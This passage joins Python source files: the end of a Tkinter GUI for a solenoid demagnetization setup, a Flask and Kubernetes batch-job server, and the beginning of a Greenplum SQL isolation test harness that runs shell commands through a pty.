self.Label_status_duration.configure(text='''Duration (s):''')
self.Label_status_duration_v = Label(self.Status_Frame)
self.Label_status_duration_v.place(
relx=0.319, rely=0.346, height=18, width=37)
self.Label_status_duration_v.configure(anchor='w')
self.Label_status_duration_v.configure(text='''Label''')
self.Label_status_duration_v.configure(
textvariable=gui_support.status_duration_v)
self.Button_status_refresh = Button(
self.Status_Frame, command=lambda: status_refresh())
self.Button_status_refresh.place(
relx=0.754, rely=0.019, height=26, width=74)
self.Button_status_refresh.configure(activebackground="#d9d9d9")
self.Button_status_refresh.configure(text='''Refresh''')
self.Button_master_stop = Button(
self.Status_Frame, command=lambda: master_stop())
self.Button_master_stop.place(
relx=0.319, rely=0.895, height=41, width=122)
self.Button_master_stop.configure(activebackground="#d80000")
self.Button_master_stop.configure(activeforeground="white")
self.Button_master_stop.configure(background="#d80000")
self.Button_master_stop.configure(font=font11)
self.Button_master_stop.configure(text='''STOP ALL''')
self.Button_master_stop.configure(width=122)
self.Button_clear_console = Button(
self.Status_Frame, command=lambda: clear_console())
self.Button_clear_console.place(
relx=0.7, rely=0.562, height=26, width=95)
self.Button_clear_console.configure(activebackground="#d9d9d9")
self.Button_clear_console.configure(text='''Clear Console''')
self.Button_print_console = Button(
self.Status_Frame, command=lambda: write_log())
self.Button_print_console.place(
relx=0.475, rely=0.562, height=26, width=70)
self.Button_print_console.configure(activebackground="#d9d9d9")
self.Button_print_console.configure(text='''Write Log''')
self.console_output = ScrolledText(self.Status_Frame)
self.console_output.place(
relx=0.029, rely=0.629, relheight=0.263, relwidth=0.951)
self.console_output.configure(background="white")
self.console_output.configure(font="TkTextFont")
self.console_output.configure(insertborderwidth="3")
self.console_output.configure(selectbackground="#c4c4c4")
self.console_output.configure(width=10)
self.console_output.configure(wrap=NONE) # noqa
self.Frame_demag = Frame(top)
self.Frame_demag.place(
relx=0.541, rely=0.743, relheight=0.251, relwidth=0.455)
self.Frame_demag.configure(relief=RAISED) # noqa
self.Frame_demag.configure(borderwidth="2")
self.Frame_demag.configure(relief=RAISED) # noqa
self.Frame_demag.configure(width=345)
self.Button_demag = Button(
self.Frame_demag, command=lambda: demagnetization())
self.Button_demag.place(relx=0.145, rely=0.550, height=40, width=215)
self.Button_demag.configure(activebackground="#d9d9d9")
self.Button_demag.configure(
text='''4. Start Demagnetization Process''')
self.Button_calibrate = Button(
self.Frame_demag, command=lambda: calibrate_demag())
self.Button_calibrate.place(
relx=0.300, rely=0.215, height=26, width=85)
self.Button_calibrate.configure(activebackground="#d9d9d9")
self.Button_calibrate.configure(text='''2. Calibrate''')
self.Label_demag_isntr1 = Label(self.Frame_demag, anchor='w')
self.Label_demag_isntr1.place(
relx=0.05, rely=0.050, height=18, width=275)
self.Label_demag_isntr1.configure(activebackground="#f9f9f9")
self.Label_demag_isntr1.configure(justify=LEFT) # noqa
self.Label_demag_isntr1.configure(
text='''1. Hold Hall sensor away from any magnetic field''')
self.Label_demag_isntr2 = Label(self.Frame_demag, anchor='w')
self.Label_demag_isntr2.place(
relx=0.05, rely=0.400, height=18, width=300)
self.Label_demag_isntr2.configure(activebackground="#f9f9f9")
self.Label_demag_isntr2.configure(justify=LEFT) # noqa
self.Label_demag_isntr2.configure(
text='''3. Hold Hall sensor directly on the tip of the solenoid''')
self.Label_demag_isntr3 = Label(self.Frame_demag, anchor='w')
self.Label_demag_isntr3.place(
relx=0.015, rely=0.820, height=18, width=335)
self.Label_demag_isntr3.configure(activebackground="#f9f9f9")
self.Label_demag_isntr3.configure(justify=LEFT) # noqa
self.Label_demag_isntr3.configure(
text='''*Note that there is a 3 second delay on each button''')
'''DEFAULT VALUES'''
if mm is None:
for child in self.MM_Frame.winfo_children():
child.configure(state='disable')
self.Entry_gtp_x.insert(0, "x")
self.Entry_gtp_y.insert(0, "y")
self.Entry_gtp_z.insert(0, "z")
self.Spinbox_step_x.insert(0, 0)
self.Spinbox_step_y.insert(0, 0)
self.Spinbox_step_z.insert(0, 0)
gui_support.radio_pos_mode.set("relative")
gui_support.radio_resolution.set("low")
gui_support.ramping_rest.set("0.25")
gui_support.ramping_rise.set("0.25")
gui_support.ramping_steady.set("0.25")
gui_support.ramping_amp.set("1")
gui_support.ramping_duration.set("10")
gui_support.sin_freq.set("10")
gui_support.sin_offset.set("1")
gui_support.sin_amplitude.set("0.5")
gui_support.sin_duration.set("10")
gui_support.square_duty.set("50")
gui_support.square_freq.set("10")
gui_support.square_duration.set("10")
gui_support.square_amp.set("1")
gui_support.constant_amps.set("1")
gui_support.constant_duration.set("10")
gui_support.velocity.set("1000")
gui_support.status_relpos_v.set("0x 0y 0z")
gui_support.status_abspos_v.set("0x 0y 0z")
gui_support.status_magfield_v.set("0")
gui_support.status_current_v.set("0")
gui_support.status_duration_v.set("0")
gui_support.status_res_v.set("Low")
gui_support.status_vel_v.set("500")
gui_support.status_wave_v.set("Constant")
self.Listbox_pos.insert(END, "0x, 0y, 0z") # noqa
status_refresh()
# The following code is added to facilitate the Scrolled widgets you specified.
class AutoScroll(object):
    '''Configure the scrollbars for a widget.

    Mixed into a Tk widget (see ScrolledText below): creates vertical and
    horizontal ttk scrollbars around the widget, grids everything into the
    master frame, and copies the master's geometry-manager methods onto the
    widget so callers can pack/grid/place the scrolled widget directly.
    '''
    def __init__(self, master):
        # Rozen. Added the try-except clauses so that this class
        # could be used for scrolled entry widget for which vertical
        # scrolling is not supported. 5/7/14.
        try:
            vsb = ttk.Scrollbar(master, orient='vertical', command=self.yview)
        except Exception:
            pass
        hsb = ttk.Scrollbar(master, orient='horizontal', command=self.xview)
        try:
            self.configure(yscrollcommand=self._autoscroll(vsb))
        except Exception:
            pass
        self.configure(xscrollcommand=self._autoscroll(hsb))
        self.grid(column=0, row=0, sticky='nsew')
        try:
            vsb.grid(column=1, row=0, sticky='ns')
        except Exception:
            pass
        hsb.grid(column=0, row=1, sticky='ew')
        master.grid_columnconfigure(0, weight=1)
        master.grid_rowconfigure(0, weight=1)
        # Copy geometry methods of master (taken from ScrolledText.py).
        # BUG FIX: the py3 branch used `or`, which short-circuits on the
        # first non-empty dict_keys and therefore copied only Pack's
        # methods; use the union of all three managers' methods, matching
        # the intent of the py2 branch (which concatenates the three lists).
        if py3:
            methods = (set(Pack.__dict__) | set(Grid.__dict__)
                       | set(Place.__dict__))
        else:
            methods = (Pack.__dict__.keys() +
                       Grid.__dict__.keys() +
                       Place.__dict__.keys())
        for meth in methods:
            if meth[0] != '_' and meth not in ('config', 'configure'):
                setattr(self, meth, getattr(master, meth))

    @staticmethod
    def _autoscroll(sbar):
        '''Hide and show scrollbar as needed.'''
        def wrapped(first, last):
            first, last = float(first), float(last)
            if first <= 0 and last >= 1:
                sbar.grid_remove()
            else:
                sbar.grid()
            sbar.set(first, last)
        return wrapped

    def __str__(self):
        return str(self.master)
def _create_container(func):
    '''Decorator: create the widget inside a fresh ttk.Frame placed on the
    given master; the frame later hosts the scrollbars next to the widget.'''
    def wrapped(cls, master, **kw):
        holder = ttk.Frame(master)
        return func(cls, holder, **kw)
    return wrapped
class ScrolledText(AutoScroll, Text):
    '''A standard Tkinter Text widget with scrollbars that will
    automatically show/hide as needed.'''
    @_create_container
    def __init__(self, master, **kw):
        # _create_container replaces `master` with a fresh ttk.Frame; the
        # AutoScroll mixin then grids this Text plus scrollbars into it.
        Text.__init__(self, master, **kw)
        AutoScroll.__init__(self, master)
if __name__ == '__main__':
    # Launch the GUI when this module is executed as a script.
    vp_start_gui()
|
server.py | import sys
import os
import time
import random
import uuid
from collections import Counter
import logging
import threading
from flask import Flask, request, jsonify, abort
import kubernetes as kube
import cerberus
import requests
from .globals import max_id, pod_name_job, job_id_job, _log_path, _read_file, batch_id_batch
from .globals import next_id
# Ensure a ./logs directory exists for per-job log files.
if os.path.isdir('logs'):
    pass
elif os.path.exists('logs'):
    raise OSError('logs exists but is not a directory')
else:
    os.mkdir('logs')
def make_logger():
    """Build and return the 'batch' logger.

    INFO and above goes both to batch.log and to the console, using one
    tab-separated line per record.
    """
    # NB: no space after levelname because WARNING is so long
    formatter = logging.Formatter(
        '%(levelname)s\t| %(asctime)s \t| %(filename)s \t| %(funcName)s:%(lineno)d | '
        '%(message)s')
    handlers = [logging.FileHandler('batch.log'), logging.StreamHandler()]
    for handler in handlers:
        handler.setLevel(logging.INFO)
        handler.setFormatter(formatter)
    log = logging.getLogger('batch')
    log.setLevel(logging.INFO)
    logging.basicConfig(handlers=handlers, level=logging.INFO)
    return log
log = make_logger()
# Kubernetes API call timeout and the fallback polling loop period.
KUBERNETES_TIMEOUT_IN_SECONDS = float(os.environ.get('KUBERNETES_TIMEOUT_IN_SECONDS', 5.0))
REFRESH_INTERVAL_IN_SECONDS = int(os.environ.get('REFRESH_INTERVAL_IN_SECONDS', 5 * 60))
# Namespace in which job pods are created.
POD_NAMESPACE = os.environ.get('POD_NAMESPACE', 'batch-pods')
log.info(f'KUBERNETES_TIMEOUT_IN_SECONDS {KUBERNETES_TIMEOUT_IN_SECONDS}')
log.info(f'REFRESH_INTERVAL_IN_SECONDS {REFRESH_INTERVAL_IN_SECONDS}')
# Use the local kubeconfig for development; in-cluster config otherwise.
if 'BATCH_USE_KUBE_CONFIG' in os.environ:
    kube.config.load_kube_config()
else:
    kube.config.load_incluster_config()
v1 = kube.client.CoreV1Api()
# Unique id for this server instance; pods are labelled with it so each
# instance only manages its own pods.
instance_id = uuid.uuid4().hex
log.info(f'instance_id = {instance_id}')
class Job:
    """One batch job, backed by a single Kubernetes pod.

    A Job registers itself in the module-level job_id_job map (and in its
    Batch's job list, if any) and creates its pod immediately on
    construction.  State machine: 'Created' -> 'Complete' or 'Cancelled'.
    """

    def _create_pod(self):
        # Create the pod from the stored template and index it by pod name
        # so pod events can be routed back to this job.
        assert not self._pod_name
        pod = v1.create_namespaced_pod(
            POD_NAMESPACE,
            self.pod_template,
            _request_timeout=KUBERNETES_TIMEOUT_IN_SECONDS)
        self._pod_name = pod.metadata.name
        pod_name_job[self._pod_name] = self
        log.info('created pod name: {} for job {}'.format(self._pod_name, self.id))

    def _delete_pod(self):
        # Delete this job's pod, if any; a 404 means it is already gone.
        if self._pod_name:
            try:
                v1.delete_namespaced_pod(
                    self._pod_name,
                    POD_NAMESPACE,
                    kube.client.V1DeleteOptions(),
                    _request_timeout=KUBERNETES_TIMEOUT_IN_SECONDS)
            except kube.client.rest.ApiException as err:
                if err.status == 404:
                    pass
                else:
                    raise
            del pod_name_job[self._pod_name]
            self._pod_name = None

    def _read_log(self):
        # Created jobs read the live pod log; Complete jobs read the saved
        # log file; Cancelled jobs have no log.
        if self._state == 'Created':
            if self._pod_name:
                try:
                    return v1.read_namespaced_pod_log(
                        self._pod_name,
                        POD_NAMESPACE,
                        _request_timeout=KUBERNETES_TIMEOUT_IN_SECONDS)
                except kube.client.rest.ApiException:
                    pass
            return None
        if self._state == 'Complete':
            return _read_file(_log_path(self.id))
        assert self._state == 'Cancelled'
        return None

    def __init__(self, pod_spec, batch_id, attributes, callback):
        """Create the job, register it, and launch its pod.

        callback, if given, is a URL that is POSTed the job's JSON when the
        job completes.
        """
        self.id = next_id()
        job_id_job[self.id] = self
        self.batch_id = batch_id
        if batch_id:
            batch = batch_id_batch[batch_id]
            batch.jobs.append(self)
        self.attributes = attributes
        self.callback = callback
        self.pod_template = kube.client.V1Pod(
            metadata=kube.client.V1ObjectMeta(generate_name='job-{}-'.format(self.id),
                                              labels={
                                                  'app': 'batch-job',
                                                  'hail.is/batch-instance': instance_id,
                                                  'uuid': uuid.uuid4().hex
                                              }),
            spec=pod_spec)
        self._pod_name = None
        self.exit_code = None
        self._state = 'Created'
        log.info('created job {}'.format(self.id))
        self._create_pod()

    def set_state(self, new_state):
        # Log every state transition; idempotent for the same state.
        if self._state != new_state:
            log.info('job {} changed state: {} -> {}'.format(
                self.id,
                self._state,
                new_state))
            self._state = new_state

    def cancel(self):
        """Cancel the job: delete its pod and mark it Cancelled (no-op if
        already complete)."""
        if self.is_complete():
            return
        self._delete_pod()
        self.set_state('Cancelled')

    def delete(self):
        """Remove the job from all tracking structures and delete its pod."""
        # remove from structures
        del job_id_job[self.id]
        if self.batch_id:
            batch = batch_id_batch[self.batch_id]
            # BUG FIX: Batch has no remove() method; detach this job from
            # the batch's job list (was `batch.remove(self)`, which raised
            # AttributeError).
            batch.jobs.remove(self)
        self._delete_pod()

    def is_complete(self):
        return self._state == 'Complete' or self._state == 'Cancelled'

    def mark_unscheduled(self):
        # The pod vanished without completing: forget it and create a new one.
        if self._pod_name:
            del pod_name_job[self._pod_name]
            self._pod_name = None
        self._create_pod()

    def mark_complete(self, pod):
        """Record the terminated pod's exit code, persist its log, and fire
        the completion callback (if any) on a background thread."""
        self.exit_code = pod.status.container_statuses[0].state.terminated.exit_code
        pod_log = v1.read_namespaced_pod_log(
            pod.metadata.name,
            POD_NAMESPACE,
            _request_timeout=KUBERNETES_TIMEOUT_IN_SECONDS)
        fname = _log_path(self.id)
        with open(fname, 'w') as f:
            f.write(pod_log)
        log.info(f'wrote log for job {self.id} to {fname}')
        if self._pod_name:
            del pod_name_job[self._pod_name]
            self._pod_name = None
        self.set_state('Complete')
        log.info('job {} complete, exit_code {}'.format(
            self.id, self.exit_code))
        if self.callback:
            def handler(id, callback, json):
                # Best-effort notification; failures are logged, not retried.
                try:
                    requests.post(callback, json=json, timeout=120)
                except requests.exceptions.RequestException as exc:
                    log.warning(
                        f'callback for job {id} failed due to an error, I will not retry. '
                        f'Error: {exc}')
            threading.Thread(target=handler, args=(self.id, self.callback, self.to_json())).start()

    def to_json(self):
        """JSON-serializable summary: id, state, exit_code and log text when
        complete, and attributes when present."""
        result = {
            'id': self.id,
            'state': self._state
        }
        if self._state == 'Complete':
            result['exit_code'] = self.exit_code
        pod_log = self._read_log()
        if pod_log:
            result['log'] = pod_log
        if self.attributes:
            result['attributes'] = self.attributes
        return result
# Flask application serving the batch REST API.
app = Flask('batch')
@app.route('/jobs/create', methods=['POST'])
def create_job():
    """Create a job from a JSON body {spec, batch_id?, attributes?, callback?}.

    `spec` is deserialized into a kubernetes V1PodSpec (fully validated only
    when the pod is created).  Returns the new job as JSON.
    """
    parameters = request.json
    schema = {
        # will be validated when creating pod
        'spec': {
            'type': 'dict',
            'required': True,
            'allow_unknown': True,
            'schema': {}
        },
        'batch_id': {'type': 'integer'},
        'attributes': {
            'type': 'dict',
            'keyschema': {'type': 'string'},
            'valueschema': {'type': 'string'}
        },
        'callback': {'type': 'string'}
    }
    validator = cerberus.Validator(schema)
    if not validator.validate(parameters):
        # NOTE(review): 400 Bad Request would be more appropriate than 404
        # for validation failures, but clients may rely on the current code.
        abort(404, 'invalid request: {}'.format(validator.errors))
    # NOTE: relies on a private kubernetes-client API to deserialize the spec.
    pod_spec = v1.api_client._ApiClient__deserialize(
        parameters['spec'], kube.client.V1PodSpec)
    batch_id = parameters.get('batch_id')
    if batch_id:
        if batch_id not in batch_id_batch:
            # BUG FIX: message said 'valid request'; this is an invalid request.
            abort(404, 'invalid request: batch_id {} not found'.format(batch_id))
    job = Job(
        pod_spec, batch_id, parameters.get('attributes'), parameters.get('callback'))
    return jsonify(job.to_json())
@app.route('/jobs', methods=['GET'])
def get_job_list():
    """Return the JSON representation of every known job."""
    return jsonify([job.to_json() for job in job_id_job.values()])
@app.route('/jobs/<int:job_id>', methods=['GET'])
def get_job(job_id):
    """Return a single job as JSON, or 404 if unknown."""
    job = job_id_job.get(job_id)
    if job is None:
        abort(404)
    return jsonify(job.to_json())
@app.route('/jobs/<int:job_id>/log', methods=['GET'])
def get_job_log(job_id):
    """Return the raw log text for a job.

    A live job is asked for its log directly; for an already-deleted job we
    fall back to its saved log file.  404 when no log can be found.

    BUG FIX: the original (flagged with pylint R1710) could fall off the end
    and implicitly return None — a Flask 500 — when a live job had no log
    yet; every path now returns a log or aborts with 404.
    """
    if job_id > max_id():
        abort(404)
    job = job_id_job.get(job_id)
    if job:
        job_log = job._read_log()
        if job_log:
            return job_log
    else:
        fname = _log_path(job_id)
        if os.path.exists(fname):
            return _read_file(fname)
    abort(404)
@app.route('/jobs/<int:job_id>/delete', methods=['DELETE'])
def delete_job(job_id):
    """Delete a job (pod and bookkeeping); 404 if unknown."""
    job = job_id_job.get(job_id)
    if job is None:
        abort(404)
    job.delete()
    return jsonify({})
@app.route('/jobs/<int:job_id>/cancel', methods=['POST'])
def cancel_job(job_id):
    """Cancel a job (delete its pod without marking it Complete); 404 if unknown."""
    job = job_id_job.get(job_id)
    if job is None:
        abort(404)
    job.cancel()
    return jsonify({})
class Batch:
    """A named group of jobs, tracked in the module-level batch_id_batch map."""

    def __init__(self, attributes):
        self.attributes = attributes
        self.id = next_id()
        batch_id_batch[self.id] = self
        self.jobs = []

    def delete(self):
        # Drop the batch itself; its jobs stay alive but are detached.
        del batch_id_batch[self.id]
        for job in self.jobs:
            assert job.batch_id == self.id
            job.batch_id = None

    def to_json(self):
        """Summary JSON: batch id, per-state job counts, and attributes."""
        counts = Counter(job._state for job in self.jobs)
        return {
            'id': self.id,
            'jobs': {state: counts.get(state, 0)
                     for state in ('Created', 'Complete', 'Cancelled')},
            'attributes': self.attributes
        }
@app.route('/batches/create', methods=['POST'])
def create_batch():
    """Create an empty batch; the body may carry string-to-string attributes."""
    schema = {
        'attributes': {
            'type': 'dict',
            'keyschema': {'type': 'string'},
            'valueschema': {'type': 'string'}
        }
    }
    parameters = request.json
    validator = cerberus.Validator(schema)
    if not validator.validate(parameters):
        abort(404, 'invalid request: {}'.format(validator.errors))
    batch = Batch(parameters.get('attributes'))
    return jsonify(batch.to_json())
@app.route('/batches/<int:batch_id>', methods=['GET'])
def get_batch(batch_id):
    """Return a batch summary as JSON, or 404 if unknown."""
    batch = batch_id_batch.get(batch_id)
    if batch is None:
        abort(404)
    return jsonify(batch.to_json())
@app.route('/batches/<int:batch_id>/delete', methods=['DELETE'])
def delete_batch(batch_id):
    """Delete a batch (its jobs survive, detached); 404 if unknown."""
    batch = batch_id_batch.get(batch_id)
    if batch is None:
        abort(404)
    batch.delete()
    return jsonify({})
def update_job_with_pod(job, pod):
    """Reconcile a job with the observed state of its pod.

    A missing pod reschedules the job; a pod whose single container has
    terminated completes it; anything else is left alone.
    """
    if not pod:
        job.mark_unscheduled()
        return
    statuses = pod.status.container_statuses
    if not statuses:
        return
    assert len(statuses) == 1
    container_status = statuses[0]
    assert container_status.name == 'default'
    if container_status.state and container_status.state.terminated:
        job.mark_complete(pod)
@app.route('/pod_changed', methods=['POST'])
def pod_changed():
    """Webhook hit by the kube watch loop whenever a pod event arrives."""
    pod_name = request.json['pod_name']
    job = pod_name_job.get(pod_name)
    if job is not None and not job.is_complete():
        pod = None
        try:
            pod = v1.read_namespaced_pod(
                pod_name,
                POD_NAMESPACE,
                _request_timeout=KUBERNETES_TIMEOUT_IN_SECONDS)
        except kube.client.rest.ApiException as exc:
            # A vanished pod (404) is handled as pod=None; anything else is fatal.
            if exc.status != 404:
                raise
        update_job_with_pod(job, pod)
    return '', 204
@app.route('/refresh_k8s_state', methods=['POST'])
def refresh_k8s_state():
    """Reconcile in-memory job state against the live Kubernetes pods.

    Pods reported by the API are applied to their jobs; tracked pods the API
    no longer reports are treated as vanished and rescheduled.
    """
    log.info('started k8s state refresh')
    pods = v1.list_namespaced_pod(
        POD_NAMESPACE,
        label_selector=f'app=batch-job,hail.is/batch-instance={instance_id}',
        _request_timeout=KUBERNETES_TIMEOUT_IN_SECONDS)
    seen_pods = set()
    for pod in pods.items:
        pod_name = pod.metadata.name
        seen_pods.add(pod_name)
        job = pod_name_job.get(pod_name)
        if job and not job.is_complete():
            update_job_with_pod(job, pod)
    # BUG FIX: update_job_with_pod(job, None) calls mark_unscheduled(), which
    # creates a new pod and inserts a new key into pod_name_job; iterating
    # the dict directly while that happens raises RuntimeError ("dictionary
    # changed size during iteration").  Iterate over a snapshot instead.
    for pod_name, job in list(pod_name_job.items()):
        if pod_name not in seen_pods:
            update_job_with_pod(job, None)
    log.info('k8s state refresh complete')
    return '', 204
def run_forever(target, *args, **kwargs):
    """Call target(*args, **kwargs) in an endless loop.

    Exceptions are logged and swallowed.  Between iterations we sleep a
    randomized duration (uniform in [0, 30s), i.e. mean ~15s) minus however
    long the run itself took, so restarts are jittered.
    """
    # target should be a function
    target_name = target.__name__
    expected_retry_interval_ms = 15 * 1000
    while True:
        start = time.time()
        try:
            log.info(f'run_forever: run target {target_name}')
            target(*args, **kwargs)
            log.info(f'run_forever: target {target_name} returned')
        except Exception:  # pylint: disable=W0703
            log.error(f'run_forever: target {target_name} threw exception', exc_info=sys.exc_info())
        end = time.time()
        run_time_ms = int((end - start) * 1000 + 0.5)
        sleep_duration_ms = random.randrange(expected_retry_interval_ms * 2) - run_time_ms
        if sleep_duration_ms > 0:
            log.debug(f'run_forever: {target_name}: sleep {sleep_duration_ms}ms')
            time.sleep(sleep_duration_ms / 1000.0)
def flask_event_loop():
    # Serve the REST API; single-threaded so request handlers need no locks.
    app.run(threaded=False, host='0.0.0.0')
def kube_event_loop():
    # Watch pod events for this instance's pods and forward each event to
    # the local /pod_changed endpoint; run_forever restarts the watch if
    # the stream ends or fails.
    watch = kube.watch.Watch()
    stream = watch.stream(
        v1.list_namespaced_pod,
        POD_NAMESPACE,
        label_selector=f'app=batch-job,hail.is/batch-instance={instance_id}')
    for event in stream:
        pod = event['object']
        name = pod.metadata.name
        requests.post('http://127.0.0.1:5000/pod_changed', json={'pod_name': name}, timeout=120)
def polling_event_loop():
    # Belt-and-braces reconciliation: periodically ask the server to refresh
    # its view of k8s state in case watch events were missed.
    time.sleep(1)
    while True:
        try:
            response = requests.post('http://127.0.0.1:5000/refresh_k8s_state', timeout=120)
            response.raise_for_status()
        except requests.HTTPError as exc:
            log.error(f'Could not poll due to exception: {exc}, text: {exc.response.text}')
        except Exception as exc:  # pylint: disable=W0703
            log.error(f'Could not poll due to exception: {exc}')
        time.sleep(REFRESH_INTERVAL_IN_SECONDS)
def serve():
    # Start the kube watch loop and the polling loop on worker threads,
    # then run Flask in the main thread (required for its debug/reloader).
    kube_thread = threading.Thread(target=run_forever, args=(kube_event_loop,))
    kube_thread.start()
    polling_thread = threading.Thread(target=run_forever, args=(polling_event_loop,))
    polling_thread.start()
    # debug/reloader must run in main thread
    # see: https://stackoverflow.com/questions/31264826/start-a-flask-application-in-separate-thread
    # flask_thread = threading.Thread(target=flask_event_loop)
    # flask_thread.start()
    run_forever(flask_event_loop)
    kube_thread.join()
|
sql_isolation_testcase.py | """
Copyright (c) 2004-Present VMware, Inc. or its affiliates.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pg
import pty
import os
import subprocess
import re
import multiprocessing
import tempfile
import time
import sys
import socket
from optparse import OptionParser
import traceback
import select
def is_digit(n):
    """Return True if *n* parses as a base-10 integer, else False."""
    try:
        int(n)
    except ValueError:
        return False
    return True
def null_notice_receiver(notice):
    """Discard a pg.connection notice: tests ignore notice messages when
    analyzing results, so they are silently dropped."""
    return None
class ConnectionInfo(object):
    """Singleton cache of gp_segment_configuration rows
    (content, hostname, port, role).

    Lets tests map a content id to the host/port of the matching segment
    without re-querying the catalog for every session.
    """
    __instance = None

    def __init__(self):
        self.max_content_id = 0
        if ConnectionInfo.__instance is not None:
            raise Exception("ConnectionInfo is a singleton.")
        query = ("SELECT content, hostname, port, role FROM gp_segment_configuration")
        con = pg.connect(dbname="postgres")
        self._conn_map = con.query(query).getresult()
        con.close()
        ConnectionInfo.__instance = self
        # max_content_id ends up as (highest content id) + 1, used below for
        # modular wrap-around of out-of-range content ids.
        for content, _, _, _ in ConnectionInfo.__instance._conn_map:
            if content >= self.max_content_id:
                self.max_content_id = content + 1

    @staticmethod
    def __get_instance():
        # Lazily construct the singleton on first use.
        if ConnectionInfo.__instance is None:
            return ConnectionInfo()
        return ConnectionInfo.__instance

    @staticmethod
    def get_hostname_port(name, role_name):
        """Return (hostname, port) for content id *name* with role *role_name*.

        Non-negative content ids wrap modulo max_content_id so tests can
        address segments with ids larger than the cluster size; negative ids
        wrap modulo the negated count.  Raises if no matching row exists.
        """
        content_id = int(name)
        conn_map = ConnectionInfo.__get_instance()._conn_map
        max_content_id = ConnectionInfo.__get_instance().max_content_id
        real_content_id = content_id % max_content_id if content_id >= 0 else content_id % (-max_content_id)
        for content, host, port, role in conn_map:
            if real_content_id == content and role == role_name:
                return (host, port)
        # BUG FIX: typo "Cannont" -> "Cannot" in the error message.
        raise Exception("Cannot find a connection with content_id=%d, role=%c" % (content_id, role_name))
class GlobalShellExecutor(object):
    """Drives a single long-lived interactive bash behind a pty.

    Isolation test cases use this to run shell snippets around SQL
    statements.  The bash prompt (BASH_PS1) acts as a sentinel marking the
    end of a command's output in the pty stream.
    """
    BASH_PS1 = 'test_sh$>'

    class ExecutionError(Exception):
        ""
        pass

    def __init__(self, output_file='', initfile_prefix=''):
        self.output_file = output_file
        self.initfile_prefix = initfile_prefix
        # Counter used to generate unique RAW_STR<n> environment variables.
        self.v_cnt = 0
        # open pseudo-terminal to interact with subprocess
        self.master_fd, self.slave_fd = pty.openpty()
        self.sh_proc = subprocess.Popen(['/bin/bash', '--noprofile', '--norc', '--noediting', '-i'],
                                        stdin=self.slave_fd,
                                        stdout=self.slave_fd,
                                        stderr=self.slave_fd,
                                        universal_newlines=True)
        self.bash_log_file = open("%s.log" % self.initfile_prefix, "w+")
        self.__run_command("export PS1='%s'" % GlobalShellExecutor.BASH_PS1)
        self.__run_command("export PS2=''")
        self.__run_command("source global_sh_executor.sh")

    def terminate(self, with_error = False):
        """Shut the bash daemon down; on clean exit, flush any accumulated
        matchsubs sections to the auto-generated init file."""
        if self.sh_proc == None:
            return
        # If write the matchsubs section directly to the output, the generated token id will be compared by gpdiff.pl
        # so here just write all matchsubs section into an auto generated init file when this test case file finished.
        if not with_error and self.initfile_prefix != None and len(self.initfile_prefix) > 1:
            output_init_file = "%s.ini" % self.initfile_prefix
            cmd = ''' [ ! -z "${MATCHSUBS}" ] && echo "-- start_matchsubs ${NL} ${MATCHSUBS} ${NL}-- end_matchsubs" > %s ''' % output_init_file
            self.exec_global_shell(cmd, False)
        if self.bash_log_file:
            self.bash_log_file.close()
        try:
            self.sh_proc.terminate()
        except OSError as e:
            # Ignore the exception if the process doesn't exist.
            pass
        self.sh_proc = None

    def __run_command(self, sh_cmd):
        """Send one command to bash and collect its output up to the next
        prompt.  Raises ExecutionError on stderr activity, timeout, or
        daemon death."""
        # Strip the newlines at the end. It will be added later.
        sh_cmd = sh_cmd.rstrip()
        bytes_written = os.write(self.master_fd, sh_cmd.encode())
        bytes_written += os.write(self.master_fd, b'\n')
        output = ""
        while self.sh_proc.poll() is None:
            # If not returns in 10 seconds, consider it as an fatal error.
            r, w, e = select.select([self.master_fd], [], [self.master_fd], 10)
            if e:
                # Terminate the shell when we get any output from stderr.
                # BUG FIX: os.read() returns bytes; decode before writing to
                # the text-mode log file (previously raised TypeError here).
                o = os.read(self.master_fd, 10240).decode()
                self.bash_log_file.write(o)
                self.bash_log_file.flush()
                self.terminate(True)
                raise GlobalShellExecutor.ExecutionError("Error happened to the bash daemon, see %s for details." % self.bash_log_file.name)
            if r:
                o = os.read(self.master_fd, 10240).decode()
                self.bash_log_file.write(o)
                self.bash_log_file.flush()
                output += o
                if o.endswith(GlobalShellExecutor.BASH_PS1):
                    # Echoed command lines come first and the trailing line is
                    # the prompt itself; return only the real output between.
                    lines = output.splitlines()
                    return lines[len(sh_cmd.splitlines()):len(lines) - 1]
            if not r and not e:
                self.terminate(True)
                raise GlobalShellExecutor.ExecutionError("Timeout happened to the bash daemon, see %s for details." % self.bash_log_file.name)
        self.terminate(True)
        raise GlobalShellExecutor.ExecutionError("Bash daemon has been stopped, see %s for details." % self.bash_log_file.name)

    # execute global shell cmd in bash deamon, and fetch result without blocking
    def exec_global_shell(self, sh_cmd, is_trip_output_end_blanklines):
        if self.sh_proc == None:
            raise GlobalShellExecutor.ExecutionError("The bash daemon has been terminated abnormally, see %s for details." % self.bash_log_file.name)
        # get the output of shell commmand
        output = self.__run_command(sh_cmd)
        if is_trip_output_end_blanklines:
            # Drop trailing blank lines (never the first line).
            for i in range(len(output)-1, 0, -1):
                if len(output[i].strip()) == 0:
                    del output[i]
                else:
                    break
        return output

    # execute gobal shell:
    # 1) set input stream -> $RAW_STR
    # 2) execute shell command from input
    # if error, write error message to err_log_file
    def exec_global_shell_with_orig_str(self, input, sh_cmd, is_trip_output_end_blanklines):
        self.v_cnt = 1 + self.v_cnt
        # Escape single quotes so input can live inside a single-quoted string.
        escape_in = input.replace('\'', "'\\''")
        # send shell cmd and set the temp RAW_STR
        cmd = ''' export RAW_STR%d='%s' && export RAW_STR=$RAW_STR%d && %s ; unset RAW_STR ''' % (
            self.v_cnt, escape_in, self.v_cnt, sh_cmd)
        return self.exec_global_shell(cmd, is_trip_output_end_blanklines)

    # extrac shell shell, sql part from one line with format: @header '': SQL
    # return row: (found the header or not?, the extracted shell, the SQL in the left part)
    def extract_sh_cmd(self, header, input_str):
        start = len(header)
        is_start = False
        end = 0
        is_trip_comma = False
        res_cmd = ""
        res_sql = ""
        input_str = input_str.lstrip()
        if not input_str.startswith(header):
            return (False, None, None)
        for i in range(start, len(input_str)):
            if end == 0 and input_str[i] == '\'':
                if not is_start:
                    # find shell begin postion
                    is_start = True
                    start = i+1
                    continue
